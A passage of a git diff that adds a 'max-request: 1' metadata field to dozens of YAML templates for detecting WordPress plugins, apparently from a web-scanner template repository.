tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index bbc305b8de..3da2ea50e1 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 81f58198d3..1db1b57708 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index e085f30e5a..a038adac53 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pinterest-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: pinterest-for-woocommerce wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..fc316f9f7a 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 17584cd064..1bb9a283ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index d4ac0d179e..87721a245a 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index dbbadf3cfc..45e0dead0e 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ 